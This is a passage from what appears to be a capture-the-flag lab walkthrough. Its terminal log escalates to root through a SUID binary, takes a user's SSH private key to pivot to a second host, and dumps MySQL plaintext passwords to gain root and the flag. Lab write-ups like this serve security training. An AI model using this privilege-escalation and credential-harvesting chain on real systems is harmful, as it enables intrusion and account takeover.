/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
www-data@host1:/var/www/html$ cd /usr/share/man/zh_TW
cd /usr/share/man/zh_TW
www-data@host1:/usr/share/man/zh_TW$ ./crypt mike
./crypt mike
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

id
id
root@host1:/usr/share/man/zh_TW# id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@host1:/usr/share/man/zh_TW# 

We appear to be inside a container.

root@host1:/usr/share/man/zh_TW# cd home
cd home
bash: cd: home: No such file or directory
root@host1:/usr/share/man/zh_TW# cd /home
cd /home
root@host1:/home# ls
ls
mike
root@host1:/home# cd mike
cd mike
root@host1:/home/mike# ls -alh
ls -alh
total 384K
drwxr-xr-x 5 mike mike 4.0K Jul 30  2021 .
drwxr-xr-x 3 root root 4.0K Jul 19  2021 ..
lrwxrwxrwx 1 root mike    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Apr  4  2018 .bashrc
drwx------ 2 mike mike 4.0K Jul 30  2021 .cache
drwx------ 3 mike mike 4.0K Jul 30  2021 .gnupg
-rw-r--r-- 1 mike mike  807 Apr  4  2018 .profile
drwx------ 2 mike mike 4.0K Jul 19  2021 .ssh
-rwxr-xr-x 1 mike mike 351K Jul 30  2021 1cryptupx
root@host1:/home/mike# cd .ssh
cd .ssh
root@host1:/home/mike/.ssh# ls -alh
ls -alh
total 16K
drwx------ 2 mike mike 4.0K Jul 19  2021 .
drwxr-xr-x 5 mike mike 4.0K Jul 30  2021 ..
-rw------- 1 mike mike 1.7K Jul 15  2021 id_rsa
-rw-r--r-- 1 mike mike  392 Jul 15  2021 id_rsa.pub
root@host1:/home/mike/.ssh# ssh -i id_rsa mike@172.16.20.6
ssh -i id_rsa mike@172.16.20.6
The authenticity of host '172.16.20.6 (172.16.20.6)' can't be established.
ECDSA key fingerprint is SHA256:L1BKa1sC+LgClbpAX5jJvzYALuhUDf1zEzhPc/C++/8.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '172.16.20.6' (ECDSA) to the list of known hosts.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
mike@host2:~$ id
id
uid=1001(mike) gid=1001(mike) groups=1001(mike)
mike@host2:~$ ss -tunlp
ss -tunlp
Netid  State    Recv-Q   Send-Q      Local Address:Port     Peer Address:Port   
udp    UNCONN   0        0           127.0.0.53%lo:53            0.0.0.0:*      
tcp    LISTEN   0        80              127.0.0.1:3306          0.0.0.0:*      
tcp    LISTEN   0        128         127.0.0.53%lo:53            0.0.0.0:*      
tcp    LISTEN   0        128               0.0.0.0:22            0.0.0.0:*      
tcp    LISTEN   0        128                  [::]:22               [::]:*      
mike@host2:~$ mysql -umkike -ppassword
mysql -umkike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'mkike'@'localhost' (using password: YES)
mike@host2:~$ mysql -umike -ppassword
mysql -umike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| accounts           |
+--------------------+
2 rows in set (0.01 sec)

mysql> use accounts;
use accounts;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+--------------------+
| Tables_in_accounts |
+--------------------+
| users              |
+--------------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+-------+---------------------+
| login | password            |
+-------+---------------------+
| root  | bjsig4868fgjjeog    |
| mike  | WhatAreYouDoingHere |
+-------+---------------------+
2 rows in set (0.00 sec)

mysql> quit
quit
Bye
mike@host2:~$ su - root
su - root
Password: bjsig4868fgjjeog

root@host2:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@host2:~# ls -alh
ls -alh
total 28K
drwx------  4 root root 4.0K Jul 19  2021 .
drwxr-xr-x 22 root root 4.0K Jun 29  2021 ..
lrwxrwxrwx  1 root root    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Jul 15  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Jul 15  2021 .ssh
-rw-------  1 root root  218 Jul 16  2021 mike.zip
root@host2:~# unzip mike.zip
unzip mike.zip
Archive:  mike.zip
[mike.zip] mike password: 

   skipping: mike                    incorrect password
root@host2:~# unzip mike.zip
unzip mike.zip
Archive:  mike.zip
[mike.zip] mike password: WhatAreYouDoingHere

 extracting: mike                    
root@host2:~# ls
ls
mike  mike.zip
root@host2:~# ls -alh
ls -alh
total 32K
drwx------  4 root root 4.0K Nov  6 17:28 .
drwxr-xr-x 22 root root 4.0K Jun 29  2021 ..
lrwxrwxrwx  1 root root    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Jul 15  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Jul 15  2021 .ssh
-rw-r--r--  1 root root   32 Jul 16  2021 mike
-rw-------  1 root root  218 Jul 16  2021 mike.zip
root@host2:~# cat mike
cat mike
THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
root@host2:~# 

Because the target has no nmap and no internet access, nmap has to be transferred to it some other way.

We need to find a way to upload Nmap to the target.

From: https://www.cnblogs.com/jason-huawen/p/16863309.html
